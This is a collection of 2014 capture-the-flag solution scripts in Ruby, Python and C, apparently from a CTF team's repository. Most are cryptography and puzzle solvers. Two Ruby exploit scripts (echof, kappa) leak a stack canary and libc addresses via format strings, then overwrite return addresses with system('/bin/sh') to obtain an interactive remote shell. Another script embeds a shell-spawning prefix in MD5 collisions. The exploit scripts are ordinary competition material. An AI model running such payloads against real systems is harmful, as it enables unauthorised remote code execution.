40 | puts answer.to_s(16).scan(/../).map{|v| v.to_i(16).chr}.join
41 | 


--------------------------------------------------------------------------------
/2014/hitcon/wtf6/find_sha1col.cpp:
--------------------------------------------------------------------------------
  1 | #include <string.h>
  2 | #include <iostream>
  3 | #include <unordered_map>
  4 | #include <stdint.h>
  5 | #include <openssl/sha.h>
  6 | #include <openssl/md5.h>
  7 | 
  8 | #define LENGTH 4166
  9 | 
 10 | using namespace std;
 11 | 
 12 | unordered_map<uint64_t, uint32_t> table;
 13 | uint8_t prefix[64];
 14 | uint8_t blocks[32][2][128];
 15 | 
 16 | bool calculate_truncated_sha1(void* input, unsigned long length, uint64_t* value)
 17 | {
 18 | 		uint8_t sha1[20];
 19 | 		int i;
 20 |     SHA_CTX context;
 21 |     if(!SHA1_Init(&context))
 22 |         return false;
 23 | 
 24 |     if(!SHA1_Update(&context, (unsigned char*)input, length))
 25 |         return false;
 26 | 
 27 |     if(!SHA1_Final(sha1, &context))
 28 |         return false;
 29 | 
 30 | 		uint8_t* ptr = (uint8_t*)value;
 31 | 		for (i = 0; i < 8; i ++)
 32 | 			ptr[i] = sha1[i + 12];
 33 |     
 34 | 		return true;
 35 | }
 36 | 
 37 | void init()
 38 | {
 39 | 	int i;
 40 | 	int j;
 41 | 	char filename[0x100];
 42 | 	// Read prefix
 43 | 	FILE* fp = fopen("./blocks/prefix.txt", "rb");
 44 | 	if (fp == NULL)
 45 | 	{
 46 | 		printf("init : prefix.txt failed\n");
 47 | 		exit(-1);
 48 | 	}
 49 | 	fread(prefix, 1, 64, fp);
 50 | 	fclose(fp);
 51 | 
 52 | 	// Read blocks
 53 | 	memset(filename, 0, sizeof(filename));
 54 | 	for (i = 0; i < 32; i++)
 55 | 	{
 56 | 		for(j = 0; j < 2; j++)
 57 | 		{
 58 | 			sprintf(filename, "./blocks/%d_%d", i + 1, j);
 59 | 			fp = fopen(filename, "rb");
 60 | 			if (fp == NULL)
 61 | 			{
 62 | 				printf("init : %s failed\n", filename);
 63 | 				exit(-1);
 64 | 			}
 65 | 			fread(blocks[i][j], 1, 128, fp);
 66 | 			fclose(fp);
 67 | 		}
 68 | 	}
 69 | }
 70 | 
 71 | void fill_buffer(uint8_t* buf, uint32_t index, uint32_t prev)
 72 | {
 73 | 	int i = 0;
 74 | 	for (i = 0; i < 32; i++)
 75 | 	{
 76 | 		if ( (prev & 1) != (index & 1))
 77 | 			memcpy(&buf[64 + 128 * i], blocks[i][index & 1], 128);
 78 | 		
 79 | 		prev = prev >> 1;
 80 | 		index = index >> 1;
 81 | 	}
 82 | }
 83 | 
 84 | void print_buffer(uint8_t* buf)
 85 | {
 86 | 	int i = 0;
 87 | 	for(i = 0; i < LENGTH; i ++)
 88 | 	{
 89 | 		printf("%02X", buf[i]);
 90 | 	}
 91 | 	printf("\n");
 92 | }
 93 | 
 94 | bool print_md5(uint8_t* input)
 95 | {
 96 | 	uint8_t md5[16];
 97 | 	int i;
 98 | 	MD5_CTX context;
 99 | 	if(!MD5_Init(&context))
100 | 		return false;
101 | 
102 | 	if(!MD5_Update(&context, (unsigned char*)input, LENGTH))
103 | 		return false;
104 | 
105 | 	if(!MD5_Final(md5, &context))
106 | 		return false;
107 | 
108 | 	for (i = 0; i < 16; i ++)
109 | 		printf("%02X", md5[i]);
110 | 	printf("\n");
111 | 	
112 | 	return true;
113 | 
114 | }
115 | 
116 | int main ()
117 | {
118 |   init();
119 | 	uint8_t buf[LENGTH];
120 | 	uint32_t i;
121 | 	uint64_t value;
122 | 	memset(buf, 0, LENGTH);
123 | 	memcpy(buf, prefix, 64); 
124 | 	memcpy(buf + 4160, "HITCON", 6);
125 | 
126 | 	uint32_t prev = 0xffffffff;
127 | 
128 | 	for(i = 0; i < 0xffffffff; i++)
129 | 	{
130 | 		fill_buffer(buf, i, prev);
131 | 		calculate_truncated_sha1(buf, LENGTH, &value);
132 | 		//print_md5(buf);
133 | 		if (table.find(value) == table.end())
134 | 		{
135 | 			// New hash
136 | 			table[value] = i;
137 | 		}
138 | 		else
139 | 		{
140 | 			printf("[*] WOOOOOOOOOOOW I found!\n");
141 | 			printf("Index1 : %d, index2 : %d\n", table[value], i);
142 | 			fill_buffer(buf, table[value], ~table[value]);
143 | 			print_buffer(buf);
144 | 			fill_buffer(buf, i, ~i);
145 | 			print_buffer(buf);
146 | 			exit(-1);
147 | 		}
148 | 		if (i % 0x10000 == 0)
149 | 			printf("%x times\n", i);
150 | 
151 | 		prev = i;
152 | 
153 | //		print_md5(buf);
154 | 	}
155 | }
156 | 


--------------------------------------------------------------------------------
/2014/hitcon/wtf6/generate_blocks.rb:
--------------------------------------------------------------------------------
 1 | def check_without_enter
 2 | 	d1 = open("md5_data1", "rb").read()
 3 | 	d2 = open("md5_data2", "rb").read()
 4 | 	if d1.index("\n") or d2.index("\n")
 5 | 		return false
 6 | 	else
 7 | 		return true
 8 | 	end
 9 | end
10 | 
11 | PREFIX = "system('/bin/sh');"
12 | FASTCOLL_PATH = "./fastcoll/fastcoll"
13 | BLOCK_DIR = "./blocks/"
14 | 
15 | f = open("prefix.txt", "wb")
16 | f.write(PREFIX)
17 | f.close
18 | 
19 | count = 0
20 | 
21 | loop do
22 | 		system("#{FASTCOLL_PATH} prefix.txt")
23 | 		if check_without_enter
24 | 			count += 1
25 | 			d = open('md5_data1', 'rb').read()
26 | 			p d.length
27 | 			open("#{BLOCK_DIR}#{count}_0", "wb").write(d[-128..-1])
28 | 			d = open('md5_data2', 'rb').read()
29 | 			open("#{BLOCK_DIR}#{count}_1", "wb").write(d[-128..-1])
30 | 
31 | 			puts "[*] #{count}th block is found!"
32 | 			
33 | 			system("mv md5_data1 prefix.txt")
34 | 		end
35 | 		break if count == 32
36 | end
37 | 
38 | system("mv prefix.txt #{BLOCK_DIR}")
39 | 


--------------------------------------------------------------------------------
/2014/olympic/echof/exploit.rb:
--------------------------------------------------------------------------------
  1 | require 'socket'
  2 | 
  3 | class Exploit
  4 | 	def initialize(host, port)
  5 | 		@s = TCPSocket.new(host, port)
  6 | 	end
  7 | 
  8 | 	def send_password
  9 | 		puts @s.readline
 10 | 		@s.write("letmein\n")
 11 | 	end
 12 | 
 13 | 	def get_values
 14 | 		puts @s.readline
 15 | 		STDIN.readline
 16 | 		@s.write("%78$8x%79$8x%82$x".ljust(128, "A"))
 17 | 		data = @s.readline
 18 | 		@canary = data[0..7].to_i(16)
 19 | 		@img_base = data[8..15].to_i(16) - 0xc10
 20 | 		@libc_base = data[16..23].to_i(16)  - 0x194D3
 21 | =begin
 22 | 		p @canary
 23 | 		p @img_base.to_s(16)
 24 | 		p @libc_base.to_s(16)
 25 | =end
 26 | 	end
 27 | 
 28 | 	def overflow
 29 | 		puts @s.readline
 30 | 
 31 | 		null_byte = "%300$c"
 32 | 		header = ""
 33 | 		payload = ""
 34 | 		base = 14
 35 | 		
 36 | 		[@canary].pack('<I').each_byte do |x|
 37 | 			if x == 0
 38 | 				payload += null_byte
 39 | 			else
 40 | 				header += x.chr + "AAA"
 41 | 				payload += "%#{base}$c"
 42 | 				base += 1
 43 | 			end
 44 | 		end
 45 | 
 46 | 		payload += "A"*12
 47 | 		
 48 | 		system = @libc_base + 0x3f430
 49 | 		bin_sh = @libc_base + 0x161D98
 50 | 
 51 | 		[system].pack('<I*').each_byte do |x|
 52 | 			if x == 0
 53 | 				payload += null_byte
 54 | 			else
 55 | 				header += x.chr + "AAA"
 56 | 				payload += "%#{base}$c"
 57 | 				base += 1
 58 | 			end
 59 | 		end
 60 | 
 61 | 		payload += "A"*4
 62 | 
 63 | 		[bin_sh].pack('<I*').each_byte do |x|
 64 | 			if x == 0
 65 | 				payload += null_byte
 66 | 			else
 67 | 				header += x.chr + "AAA"
 68 | 				payload += "%#{base}$c"
 69 | 				base += 1
 70 | 			end
 71 | 		end
 72 | 	
 73 | 		remain = 256 - header.length
 74 | 		p remain
 75 | 		payload = header + "%#{remain}c" + payload
 76 | 		p payload.length
 77 | 		
 78 | 		@s.write(payload.ljust(128, "A"))
 79 | #		@s.write("AAAA%1$x".ljust(128, "A"))
 80 | 		p @s.readline
 81 | 	end
 82 | 
 83 | 	def trigger
 84 | 		7.times do |x|
 85 | 			puts @s.readline
 86 | 			@s.puts("a")
 87 | 			puts @s.readline
 88 | 			sleep(0.1)
 89 | 		end
 90 | 	end
 91 | 
 92 | 	def shell
 93 | 		Thread.new { loop { print @s.read(1) } }
 94 | 		loop do
 95 | 			@s.puts(STDIN.readline)
 96 | 		end
 97 | 	end
 98 | end
 99 | 
100 | e = Exploit.new('localhost', 3129)
101 | e.send_password
102 | e.get_values
103 | e.overflow
104 | e.trigger
105 | e.shell
106 | 
107 | 


--------------------------------------------------------------------------------
/2014/olympic/mic/solve.rb:
--------------------------------------------------------------------------------
 1 | require 'openssl'
 2 | require 'pwnbox'
 3 | require 'socket'
 4 | 
 5 | include Pwnbox
 6 | 
 7 | list = []
 8 | 
 9 | def get_data(p, g)
10 |   s = TCPSocket.new('143.248.2.79', 3120)
11 |   puts s.readline
12 |   s.puts(p)
13 |   puts s.readline
14 |   s.puts(g)
15 |   d = s.readline[18..-1].to_i
16 |   s.close
17 |   d
18 | end
19 | 
20 | flags = []
21 | primes = []
22 | 6.times do |x|
23 |   prime = OpenSSL::BN.generate_prime(128).to_i
24 |   flags.push((get_data(prime, 2) + get_data(prime, -2)) % prime)
25 |   primes.push(prime)
26 | end
27 | 
28 | p Number.i_to_s(Number.chinese_remainder_theorem(flags, primes) / 2)
29 | 


--------------------------------------------------------------------------------
/2014/pctf/graph/solve.py:
--------------------------------------------------------------------------------
 1 | import os,random,math,pickle,zlib
 2 | def intract(n):
 3 |   s = []
 4 |   while n > 0:
 5 |     s.append(chr(n & 0xff))
 6 |     n = n >> 8
 7 |   return ''.join(s[::-1])
 8 | 
 9 | d = open('ciphertext','r').read().decode("base64")
10 | ct = pickle.loads(zlib.decompress(d))
11 | 
12 | pub = open('pubkey', 'r')
13 | pub = ''.join(pub.readlines()[1:-1])
14 | 
15 | pk = pickle.loads(zlib.decompress(pub.decode("base64")))
16 | pubkey = pk['pub']
17 | keylen = len(pubkey)
18 | 
19 | pubkey_sorted = sorted(pubkey, key=lambda x:len(x))
20 | limit = len(pubkey_sorted[63])
21 | 
22 | privkey = []
23 | for i in xrange(len(pubkey)):
24 | 	if (len(pubkey[i]) <= limit):
25 | 		privkey.append(i)
26 | 	
27 | print privkey
28 | print intract(reduce(lambda a,b:a+b,[ct[i] for i in privkey]))
29 | 


--------------------------------------------------------------------------------
/2014/pctf/kappa/exploit.rb:
--------------------------------------------------------------------------------
  1 | require 'socket'
  2 | 
  3 | class Exploit < TCPSocket
  4 | 	def puts s
  5 | 		sleep(0.1)
  6 | 		super s+"\n"
  7 | 	end
  8 | 
  9 | 	def banner
 10 | 		STDOUT.puts readline()
 11 | 	end
 12 | 	def read_menu
 13 | 		
 14 | 	end
 15 | 	def get_pocketmon
 16 | 		read_menu
 17 | 		puts("1")
 18 | 		5.times{ STDOUT.puts readline }
 19 | 		read_menu
 20 | 		puts("1")
 21 | 		9.times { STDOUT.puts readline }
 22 | 		puts("2")
 23 | 		3.times { STDOUT.puts readline }
 24 | 		puts("asdf")
 25 | 	end
 26 | 
 27 | 	def run_pocketmon
 28 | 		read_menu
 29 | 		puts "1"
 30 | 		5.times{ STDOUT.puts readline }
 31 | 		puts "1"
 32 | 		read_menu
 33 | 		9.times { STDOUT.puts readline }
 34 | 		puts "3"
 35 | 		1.times { STDOUT.puts readline }
 36 | 	end
 37 | 
 38 | 	def get_charizard
 39 | 		read_menu
 40 | 		puts "1"
 41 | 		5.times { STDOUT.puts readline }
 42 | 		4.times do
 43 | 			puts "1"
 44 | 			6.times do 
 45 | 				STDOUT.puts readline
 46 | 			end
 47 | 		end
 48 | 		puts "2"
 49 | 		7.times do 
 50 | 			STDOUT.puts readline
 51 | 		end
 52 | 		puts "/bin/sh;"
 53 | #=begin
 54 | 		11.times do 
 55 | 			STDOUT.puts readline
 56 | 		end
 57 | #=end
 58 | 		puts "2"
 59 | 	end
 60 | 
 61 | 	def send_payload1
 62 | 
 63 | 		payload = "AAAAA"
 64 | 		376.times do |x|
 65 | 			payload += "%04X" % x
 66 | 		end
 67 | 		
 68 | 		payload += [0x08048522].pack('<I')
 69 | 
 70 | 		payload = payload.ljust(2128, "B")
 71 | 		send_payload payload
 72 | 	end
 73 | 
 74 | 	def send_payload payload
 75 | 		read_menu
 76 | 		puts "5"
 77 | 		10.times { STDOUT.puts readline }
 78 | 		puts "2"
 79 | 		write payload
 80 | 		STDOUT.puts readline
 81 | 	end
 82 | 
 83 | 	def send_payload2 libc
 84 | 		payload = "AAAAA"
 85 | 		0x7f.times do |x|
 86 | 			payload += "%04X" % x
 87 | 		end
 88 | #		payload += "EEEE"
 89 | #		system = libc + 0x0003F430
 90 | 		system = libc + 0x0003B990
 91 | 		payload += [system].pack('<I')
 92 | 		payload = payload.ljust(2128, "B")
 93 | 		send_payload payload
 94 | 	end
 95 | 	def exploit
 96 | 		STDIN.readline
 97 | 		read_menu
 98 | 		puts "3" 
 99 | 	end
100 | 
101 | 	def change_pocketmon
102 | 		read_menu
103 | 		puts "1"
104 | 		read_menu
105 | 		2.times{ STDOUT.puts readline }
106 | 		puts "4"
107 | 		11.times {STDOUT.puts readline}
108 | 		puts "2"
109 | 		4.times { STDOUT.puts readline}
110 | 		puts "1"
111 | 		1.times { |x| STDOUT.puts "%d : " %x + readline}
112 | 		d = readline
113 | 		readline
114 | 		return d[6..9].unpack('<I')[0] - 0x000498F0
115 | 		#return d[6..9].unpack('<I')[0] - 0x0004CED0  
116 | 	end
117 | 
118 | 	def read_menu
119 | 		7.times{ STDOUT.puts readline }
120 | 	end
121 | end
122 | s = Exploit.new('54.80.112.128', 1313)
123 | #s = Exploit.new('localhost', 1313)
124 | s.banner
125 | 4.times { s.get_pocketmon }
126 | 2.times { s.run_pocketmon }
127 | s.get_charizard
128 | s.send_payload1
129 | libc = s.change_pocketmon
130 | puts "[*] Libc : %x" % libc
131 | s.send_payload2 libc
132 | s.exploit
133 | 
134 | Thread.new do
135 | 	loop do
136 | 	puts s.readline
137 | 	end
138 | end
139 | s.puts "id"
140 | 
141 | loop do
142 | 	s.puts STDIN.readline()
143 | end
144 | 
145 | =begin
146 | #s = Exploit.new('54.80.112.128', 1313)
147 | 4.times { s.get_pocketmon }
148 | 2.times { s.run_pocketmon }
149 | s.get_charizard
150 | s.send_payload
151 | s.change_pocketmon
152 | 
153 | s.send_payload2
154 | s.exploit
155 | sleep(10)
156 | =begin
157 | loop do
158 | 	x = STDIN.readline()
159 | 	p x
160 | 	s.puts(x)
161 | end
162 | =end
163 | 


--------------------------------------------------------------------------------
/2014/pctf/wheeee/crack.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | #include <openssl/sha.h>
 4 | int main(int argc, char** argv)
 5 | {
 6 |         unsigned char ibuf[21];
 7 |         unsigned char obuf[20];
 8 |         unsigned int i, j;
 9 |         memset(ibuf, 0, sizeof(ibuf));
10 |         memcpy(ibuf, argv[1], 16);
11 | 	char end = 0x77;
12 | 	char start = 0x30;
13 | 
14 | 	char a, b, c, d, e; 
15 | 	
16 | 	for(a = 0x41; a < 0x7a; a++)
17 | 	{
18 | 		ibuf[16] = a;
19 | 		for(b = 0x41; b < 0x7a; b++)
20 | 		{
21 | 			ibuf[17] = b;
22 | 			for (c = 0x41; c < 0x7a; c++)
23 | 			{
24 | 				ibuf[18] = c;
25 | 				for (d  = 0x41; d < 0x7a; d++)
26 | 				{
27 | 					ibuf[19] = d;
28 | 					for (e = 0x41; e < 0x7a; e++)
29 | 					{
30 | 						ibuf[20] = e;
31 | 
32 | 						SHA1(ibuf, sizeof(ibuf), obuf);
33 | 						if (obuf[19] == 0xff && obuf[18] == 0xff && obuf[17] == 0xff && (obuf[16] & 3) == 3)
34 | 						{
35 | 							for (i = 0; i < 21; i++) {
36 | 								printf("%c", ibuf[i]);
37 | 							}
38 | 
39 | 							return;
40 | 						}
41 | 
42 | 						
43 | 					}
44 | 				}
45 | 			}
46 | 		}
47 | 	}
48 | 	
49 | }
50 | 


--------------------------------------------------------------------------------
/2014/pctf/wheeee/extract_data.py:
--------------------------------------------------------------------------------
 1 | import random,commands
 2 | from socket import *
 3 | 
 4 | 
 5 | def generate():
 6 | 	# payload for verifying result
 7 | 	payload = ""
 8 | 	for i in xrange(0, 0xfff):
 9 | 		payload += "000%03x" % i
10 | 
11 | 	return payload
12 | 
13 | payload = generate()
14 | print len(payload)
15 | f = open('result', 'a')
16 | block_size = 1026
17 | 
18 | for x in xrange(0, len(payload), block_size):
19 | 	s = socket(AF_INET, SOCK_STREAM)
20 | 	s.connect(('54.82.75.29', 8193))
21 | 	print s.makefile().readline()
22 | 	seed = s.makefile().readline()[31:47]
23 | 	print "seed : %s" % seed
24 | 	result = commands.getstatusoutput('./crack %s' % seed)[1]
25 | 	if (result == ''):
26 | 		s.close()
27 | 		x -= block_size
28 | 		continue
29 | 	print "result : %s" % result
30 | 	s.send(result+"\n")
31 | 	print s.makefile().readline()
32 | 	print s.makefile().readline()
33 | 	print payload[x:x+block_size]
34 | 	s.send(payload[x:x+block_size]+"\n")
35 | 	encrypted = s.recv(block_size + 1).rstrip()
36 | 	encrypted += "0" * (block_size - len(encrypted))
37 | 	print "input : %d, output : %d" % (len(payload[x:x+block_size]), len(encrypted))
38 | 	f.write(encrypted+"\n")
39 | 	print encrypted
40 | 	s.close()
41 | 


--------------------------------------------------------------------------------
/2014/seccon/BBQR/solve.py:
--------------------------------------------------------------------------------
 1 | from reedsolo import *
 2 | import struct
 3 | 
 4 | def find_data(b):
 5 |     string = ""
 6 |     for c in b:
 7 |         string += chr(c)
 8 | 
 9 |     for i in xrange(65536):
10 |         try:
11 |             rs = RSCodec(22)
12 |             guess = bytearray("X"*11 + struct.pack('H', i) + string)
13 |             s = rs.decode(guess)
14 |             b = []
15 |             map(lambda x:b.append(bin(x)[2:].rjust(8,"0")), s)
16 |             return b
17 |         except Exception, e:
18 |             pass
19 | 
20 | 
21 | r= ["01011010", "01011111", "00110101", "10101111", "10110101", "10001111", "00100011", "00110100", "01100100", "00110100", "10101101", "00100010", "10011011", "10011111", "01000011", "00001111", "01110000", "10110110", "01100100", "11111011", "10111111", "00000111", "11001100", "11001001", "01110101", "10111111", "11100110", "11100011", "11100001", "01011110", "10000000", "11010001", "01100011", "00001100", "00101011", "01000101", "10100010", "10111101", "00000101", "01101001", "01100001", "00111110", "10100111", "11110100"]
22 | 
23 | r = map(lambda x: int(x,2), r)
24 | find_data(r[0:22])
25 | find_data(r[22:])
26 | 
27 | 
28 | 


--------------------------------------------------------------------------------
/2014/seccon/Choose/solve.rb:
--------------------------------------------------------------------------------
 1 | require 'socket'
 2 | s = TCPSocket.new('number.quals.seccon.jp', 31337)
 3 | 
 4 | 
 5 | loop do 
 6 | 
 7 | min = 999999999999999999999
 8 | max = -99999999999999999999
 9 | data = s.readline
10 | puts "[*] Data : %s" % data
11 | data.split(",").each do |i|
12 |   i = i.to_i
13 |   if min > i
14 |     min = i
15 |   end
16 |   if max < i
17 |     max = i
18 |   end
19 | end
20 | 
21 | choose = s.read('The minimum number? '.length)
22 | puts "[*] Q : %s" % choose
23 | answer = ""
24 | if choose.index("max")
25 |   answer = "%d" % max
26 | else
27 |   answer = "%d" % min
28 | end
29 | puts "Answer : #{answer}"
30 | s.write(answer)
31 | end
32 | 


--------------------------------------------------------------------------------
/2014/seccon/Crypto_Easy/factor.rb:
--------------------------------------------------------------------------------
 1 | require 'prime'
 2 | require 'openssl'
 3 | 
 4 | def factorize n
 5 |   sqrt = Math.sqrt(n).to_i
 6 |   p = 1
 7 |   loop do 
 8 |     p += 1
 9 |     break if (n % p) == 0
10 |   end
11 | 
12 |   q = n / p
13 | 
14 |   if (q.prime? and p.prime?)
15 |     puts "[*] Prime factor of %X : %X, %X" % [n, p, q]
16 |   else
17 |     puts "[*] Error : no prime factorization"
18 |   end
19 | 
20 |   return [p,q]
21 | end
22 | 
23 | def chinese_remainder(mods, remainders)
24 |   max = mods.inject( :* )                            
25 |   series = remainders.zip( mods ).map{|r,m| r.step( max, m ).to_a } 
26 |   series.inject( :& ).first #returns nil when empty
27 | end
28 | 
29 | def extended_gcd(a, b)
30 |   last_remainder, remainder = a.abs, b.abs
31 |   x, last_x, y, last_y = 0, 1, 1, 0
32 |   while remainder != 0
33 |     last_remainder, (quotient, remainder) = remainder, last_remainder.divmod(remainder)
34 |     x, last_x = last_x - quotient*x, x
35 |     y, last_y = last_y - quotient*y, y
36 |   end
37 |  
38 |   return last_remainder, last_x * (a < 0 ? -1 : 1)
39 | end
40 |  
41 | def invmod(e, et)
42 |   g, x = extended_gcd(e, et)
43 |   if g != 1
44 |     raise 'Teh maths are broken!'
45 |   end
46 |   x % et
47 | end
48 | 
49 | def solve(n, b, c)
50 |   p,q = factorize(n)
51 |   root = b**2 + 4 * c
52 | 
53 |   x = root.to_bn.mod_exp((p + 1)/4, p).to_i
54 |   y = root.to_bn.mod_exp((q + 1)/4, q).to_i
55 | 
56 | #  root = chinese_remainder([p, q], [x, y])
57 |   root = chinese_remainder([p, q], [-x, y])
58 | 
59 |   s1 = ((-b + root) * invmod(2, n)) % n
60 |   s2 = ((-b - root) * invmod(2, n)) % n
61 | 
62 |   if ( (s1 ** 2 + s1 * b - c) % n ) == 0 and ((s2 ** 2 + s2 * b - c) % n) == 0
63 |     puts "[*] Yeah GOT SOLUTION : #{s1.to_s(16)}, #{s2.to_s(16)}"
64 |   else
65 |     puts "[*] Wrong :("
66 |   end
67 | end
68 | 
69 | solve(0xb8ae199365,0xffeee,0x8d5051562b)
70 | solve(0xb86e78c811, 0xfffee,  0x5ffa0ac1a2)
71 | solve(0x7bd4071e55, 0xfefef, 0x6008ddf867)
72 | 
73 | 


--------------------------------------------------------------------------------
/2014/seccon/Crypto_Easy/run.c:
--------------------------------------------------------------------------------
 1 | #include <stdint.h>
 2 | #include <stdio.h>
 3 | char chk_rand(char guess)
 4 | {
 5 |     char real = rand() & 0xff;
 6 | //    printf("%2X, %2X", real, guess);
 7 | 
 8 |     return real == guess;
 9 | }
10 | 
11 | 
12 | void decrypt(int seed)
13 | {
14 | 
15 |     char filename[0x100], ch;
16 |     FILE *out, *in;
17 |     srand(seed);
18 | 
19 |     sprintf(filename, "file.%8X.png", seed);
20 |     out = fopen(filename, "wb");
21 |     in = fopen("ecrypt1.bin", "rb");
22 | 
23 |     while(fread(&ch, 1, 1, in) == 1)
24 |     {
25 |         ch ^= rand();
26 |         fwrite(&ch, 1, 1, out);
27 |     }
28 | 
29 |     fclose(in);
30 |     fclose(out);
31 | }
32 | 
33 | int main()
34 | {
35 |     uint32_t seed;
36 | 
37 |     seed = time(NULL);
38 |     srand(seed);
39 |     for (seed = time(NULL); seed >= 0; seed--)
40 |     {
41 | //        89 50 4E 47
42 | //        34 70 F0 2D
43 |         srand(seed);
44 |         //printf("%2X\n",rand());
45 |         if (chk_rand(0x34 ^ 0x89) &&
46 |                 chk_rand(0x50 ^ 0x70) &&
47 |                 chk_rand(0x4e ^ 0xf0) &&
48 |                 chk_rand(0x47 ^ 0x2d))
49 |         {
50 |             printf("[*] Guessed seed : %8X\n", seed);
51 |             decrypt(seed);
52 |             break;
53 |         }
54 | 
55 |         if ((seed % 0x10000) == 0)
56 |             printf("%8X\n", seed);
57 |     }
58 | }
59 | 


--------------------------------------------------------------------------------
/2014/seccon/Crypto_Hard/decrypt.rb:
--------------------------------------------------------------------------------
 1 | #encoding BINARY
 2 | require 'openssl'
 3 | 
 4 | def parse_input input
 5 |   input.scan(/.{7}/m).map{|v| string_to_int(v)}
 6 | end
 7 | 
 8 | def string_to_int string
 9 |   num = 0
10 |   string.each_byte do |elem|
11 |     num = (num << 8) + elem
12 |   end
13 |   num
14 | end
15 | 
16 | #based on pseudo code from http://en.wikipedia.org/wiki/Extended_Euclidean_algorithm#Iterative_method_2 and from translating the python implementation.
17 | def extended_gcd(a, b)
18 |   last_remainder, remainder = a.abs, b.abs
19 |   x, last_x, y, last_y = 0, 1, 1, 0
20 |   while remainder != 0
21 |     last_remainder, (quotient, remainder) = remainder, last_remainder.divmod(remainder)
22 |     x, last_x = last_x - quotient*x, x
23 |     y, last_y = last_y - quotient*y, y
24 |   end
25 | 
26 |   return last_remainder, last_x * (a < 0 ? -1 : 1)
27 | end
28 | 
29 | def invmod(e, et)
30 |   g, x = extended_gcd(e, et)
31 |   if g != 1
32 |     raise 'Teh maths are broken!'
33 |   end
34 |   x % et
35 | end
36 | 
37 | p = (0x1000000 * 0x1000000) + 21
38 | x = 2
39 | 
40 | =begin
41 | data =  parse_input "00ee 23ed c816 9000 983f b74d 0284"
42 | key = data[0]
43 | enc = data[1]
44 | 
45 | s = key.to_bn.mod_exp(2, p).to_i
46 | s = invmod(s, p)
47 | s = (enc * s ) % p
48 | p s.to_s(16)
49 | =end
50 | 
51 | =begin
52 | k=20
53 | loop do
54 |   if (7776.to_bn.mod_exp(k, p).to_i == 69219086192344)
55 |     puts "[*] I FOUND KEY : %d\n" % k
56 |     break
57 |   end
58 |   k += 1
59 | end
60 | =end
61 | 
62 | x = 9999
63 | #f = open("gg.bin", "rb").read()
64 | f = open("eflag.bin", "rb").read()
65 | 
66 | data = parse_input(f)
67 | key = data[0]
68 | #data = data.slice!(1,10)
69 | data = data.slice!(1, data.length)
70 | s = key.to_bn.mod_exp(9999, p).to_i
71 | s = invmod(s, p)
72 | 
73 | fo = open("flag.png", "wb")
74 | #fo = open("gg_d.png", "wb")
75 | 
76 | data.each do |d|
77 |   x = "%012X" % ((d*s) % p)
78 |   fo.write([x].pack('H*'))
79 | end
80 | fo.close()
81 | 


--------------------------------------------------------------------------------
/2014/seccon/Ms.Fortune/solve.rb:
--------------------------------------------------------------------------------
 1 | require 'bigdecimal'
 2 | 
 3 | def string_to_int string
 4 |   num = 0
 5 |   string.split.each do |x|
 6 |     num = (num << 8) + x.to_i(16)
 7 |   end
 8 |   num
 9 | end
10 | 
11 | 
12 | n = "fd 7f c4 9e 20 04 f3 b7 ee 67 c3 6f 7a 86 c8 0a 2e fe e0 39 0c 58 1f bd 4d 74 5d 93 95 b5 98 a2 ee 08 bd 5d 33 7e 97 e8 09 84 56 6c 2c 85 3e f6 3e cc 82 b4 94 50 81 ac 16 eb e6 27 c2 91 6f 96 59 fb 09 91 30 46 e4 35 41 25 76 ad 9d 0b a1 de 4e 8d 99 a4 b2 90 1e b0 af 70 d5 ac 99 ab 30 cf 65 21 2c 50 6e b1 26 c1 8e 06 87 51 15 52 4f a6 a8 af fc 15 b3 d9 9a 32 5e 22 e1 f3 54 b0 cf 6a 9a c8 d7 d7 af 2a ee 29 c2 46 16 32 e3 70 c4 22 c1 22 fb f5 81 d0 71 ec 5b 71 39 de b7 83 57 47 45 b9 6f 40 6b cb c9 d7 d8 18 1b 4a e6 ba ee 0e d3 f3 30 18 ef b9 dd ca 42 92 dd 08 a9 dd ed 9e d7 ca 79 d1 38 d5 1d 5d aa 4a ea 6a 8d 60 04 88 5a 6c eb 8a 63 02 89 9c e4 97 d2 63 e8 56 c9 8e de a3 ab 9d 68 72 68 21 ed e3 49 e4 53 ba dd a2 69 f2 0c ec a5 85 9c 44 c9 d6 c4 3f 9c 11 00 5e 3d cf 35 53 08 f0 88 1b 2a 80 49 1c 33 4d fa 86 b9 e5 cf 8d 8a 88 6c 74 f3 0b f7 df 8d 59 9f d9 3b 33 a3 38 6a 0c e4 99 9d d0 89 26 bf 0d 49 66 aa 7e 52 bd d3 ff 7d 1b 68 7b b9 37 bd bc 19 f1 d8 02 58 a1 ff e9 b8 e7 d4 c4 d3 b3 e8 08 0d 82 98 94 35 e0 79 bf 14 2a 07 6d 88 6d f8 f2 a7 ff 7f 5b 4c c1 f4 7c ee a8 9f 14 7d 6d 31 f0 8c f3 09 8a e6 f9 a6 c6 ee 77 29 b3 60 29 7e 6e f4 6c 92 66 35 eb 94 5a 6c 4f 2e 8f b7 cc 72 c5 33 cd 1f 8b ed 90 28 c2 63 eb dd 7c ab 19 b2 94 9f 81 61 8e c9 e0 00 83 99 69 89 02 2a 83 56 e8 6a 18 5f 09 f3 59 05 63 41 fa 92 2f bf 19 cf 48 05 36 53 47 9e 9e 28 60 30 b4 7b 8c 62 89 c5 c9 14 96 0b 2b 20 35 b2 da f0 1b 8f e5 38 25 89 89 81 e7 7b ac 85 bc 1e 79 57 7d af 12 32 fe e8 ef 4a 3e ba 23 ca 85 4b 2d e4 89 8a e0 5d 41 cb 43 ee 53"
13 | 
14 | n = string_to_int(n)
15 | 
16 | root_n = BigDecimal(n.to_s).sqrt(2000).to_i
17 | prev = n % root_n
18 | loop do
19 |   root_n += 1
20 |   if (n % root_n) == 0
21 |     puts "[*] Got factor! : %d" % root_n
22 |     break
23 |   end
24 | #  readline
25 | end
26 | 


--------------------------------------------------------------------------------
/2014/seccon/QR_Easy/solve.rb:
--------------------------------------------------------------------------------
  1 | =begin
  2 | def calc_bch num
  3 |   orig = num
  4 |   num = num << 10
  5 |   bch = 2**10 + 2**8 + 2**5 + 2**4 + 2**2 + 2 + 1
  6 |   while (num >= bch)
  7 |     bit_length = num.to_s(2).length - 1
  8 |     num ^= (bch << (bit_length - 10))
  9 |   end
 10 |   num = (orig << 10) + num
 11 |   num ^= 0b101010000010010
 12 |   "%015B" % num
 13 | end
 14 | 
 15 | 8.times do |x|
 16 |   guess = ("10" + "%03B" % x).to_i(2)
 17 |   if calc_bch(guess)[-8..-1] == "10111110"
 18 |     puts "[*] Mask pattern : %03B" % x 
 19 |   end
 20 | end
 21 | =end
 22 | 
 23 | d = [0]
